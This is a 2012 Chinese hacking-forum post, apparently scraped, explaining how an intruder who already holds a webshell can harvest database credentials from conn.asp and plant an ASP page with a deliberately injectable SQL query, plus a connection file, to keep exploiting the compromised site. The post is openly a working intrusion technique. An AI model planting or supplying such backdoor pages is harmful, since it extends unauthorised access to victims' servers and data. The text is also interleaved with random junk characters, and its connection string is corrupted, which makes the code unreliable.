找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1920|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵' F9 b' z0 ?& F  E) q/ ~  W

2 Z+ W, H; m7 L9 s0 z2 B. v- ~) G今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息- K: W% ]$ A: h8 \2 [, K) {# R

8 V: ]  m$ v& l  M, E这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
* }1 _+ |2 h# _) S. p8 ]
" k( n' q, [9 z4 ~" O: z! U首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和; ]( N* X# x4 r$ a6 h- |" \3 W9 g

$ v" S" I. l3 a6 T' D6 T! I  d密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
- u$ W4 D* T/ [. `, J- I2 N
3 f4 m9 P1 @/ w7 ~) w因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:9 J) T) e- C* w6 \; H

. _5 N; T# _/ p0 I程序代码
: p2 ?, G! U6 g0 P. E- o$ N" D<!--#include file="xx.asp"-->
8 b5 F: ?! I' x7 ]: W1 U' F<%' ]1 P0 c  K$ [; ]
set rs=server.createobject("ADODB.recordset")
$ q1 ?1 e# `+ U6 g: A; wid = request("id")
# a. G. @: F, \: ]/ b$ S! ]strSQL = "select * from admin where id=" & id& R- c* p( Y) X+ z, t; ^$ C, ?
rs.open strSQL,conn,1,3
4 h3 c! [3 |  P+ k; \, ?9 z- Jrs.close
3 g3 D% B& ^; ^  F! ~%>/ T4 s# K6 k5 B' M9 t5 ^% z7 e$ [
- Q7 \! e$ H# Q) s% o4 n/ p, F
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
. I& H! ~  m& |; }/ ^6 B/ ]. C1 A- n% M2 S0 J+ A
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
  e( x* y* f1 E* v0 w/ T) W  O
  p: X" i, ]* @2 Q然后就要构造一个连接数据库的文件了,代码如下:  I6 a/ D7 q8 M
程序代码+ W9 j# h) L8 t. v+ I- f
<%        
) i8 v; Y* T  _* KstrSQLServerName = "000.000.000.000"     '服务器名称或地址3 O' U7 Y. r9 l$ X9 m
strSQLDBUserName = "sqlname"         '数据库帐号; |: q7 G; y" W9 O- S
strSQLDBPassword = "sqlpass"         '数据库密码
! t8 l9 W; a! f2 e: _  k4 B4 o' DstrSQLDBName = "sqldataname"           '数据库名称
+ }. r# \: k$ ~. r) CSet conn = Server.CreateObject("ADODB.Connection")
( K0 j$ S1 f9 a1 K$ h; J6 YstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"- s3 ?, s* J. h, g" p9 c* n$ H6 f7 M# K
conn.open strCon
5 p3 x7 b+ E& H%>' [% E" V+ p3 @3 A

8 B) q5 M! @  y* F, J, N6 d7 Y这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,# G/ ^' h  r8 X* }, u# x

! I- P2 [3 E& m: m; v0 G就这样,正常情况下,就OK了,伪造成功……
6 R5 e. B! ^0 m! [& T3 n+ X: ]* _; H2 q
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表